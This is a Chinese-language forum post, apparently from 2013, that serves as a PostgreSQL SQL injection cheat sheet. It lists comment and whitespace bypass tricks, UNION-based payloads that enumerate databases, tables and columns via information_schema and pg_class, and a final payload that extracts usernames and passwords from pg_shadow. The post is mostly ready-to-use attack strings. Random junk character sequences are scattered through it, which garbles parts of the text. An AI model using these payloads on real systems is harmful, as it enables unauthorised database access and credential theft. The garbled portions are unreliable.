结合了MSSQL MySQL Oracle的一些特点
" c! V0 q9 J- U支持多语句执行,语句可以没有from postgres用户是超级用户(创始人账户) 只有superuser有copy权限 注释: — , /**/* X' B) Y+ s3 P" L6 N$ m
连接符: %20 , + , /**/ 内置函数: V# s8 C: J1 t+ _" n* i( P
current_database() //当前数据库名
% J3 s9 O# w7 I1 q) `# b7 [session_user //会话用户) {7 M, T1 L0 `& n
current_user //当前数据库用户& j% V5 F8 g" O7 {0 Z
user //当前用户) ]9 Q$ t% T" U7 r$ i) t
version() //数据库版本 Union注射:0 `# ^ }6 z: T" r5 P: Y( z( T
order by n–
# [/ F0 Z& S# a" v/ j8 X' o' Pand 1=2 union select null,null,null–
6 [7 I: i$ ` X/ F. qand 1=2 union select ‘beach’,null,null–
% p, o5 m3 ~/ ^: i6 |6 Yand 1=2 union select (select version()),null,null– 获取表名,字段名(新版本利用information_schema):3 p! ^) P0 x; W6 _
group_concat(table_name)8 N; D0 n% L2 F- p7 p# B) ^+ E
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–
: h& J1 e8 u3 P mand 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–" m1 r4 C. y4 z6 ?9 C$ g
(老版本)% h! B( o" [& K/ L3 J
pg_class.oid对应pg_attribute.attrelid6 {* c6 o; h' R/ F3 R/ Z
pg_class.relname表名% F/ O9 W6 b: B; A
pg_attribute.attname字段名 select relname from pg_class获取表名
3 G2 N# T: F# i3 K4 \, f, @% J: n rselect oid from pg_class where 条件 获取参数. s$ @( h' U2 C( p! F" N/ p/ k. j8 ?
select attname from pg_attribute where attrelid=’oid的值’ 获取字段名 实战:, p: O! a4 l4 |; d7 g4 N
and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表
( S: a0 [; s1 o1 `and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–
9 \8 l ]2 b. H8 I! Q4 K' b0 v6 I- f由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136 and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名1 \7 |0 q5 U3 d" B: p3 V4 G2 S
======================================================================
) [# E2 r% j5 [and 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库3 X' ^: E& s+ E, f
and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码 | 
抢楼
发表于 2013-10-13 12:57:16
收藏
支持
反对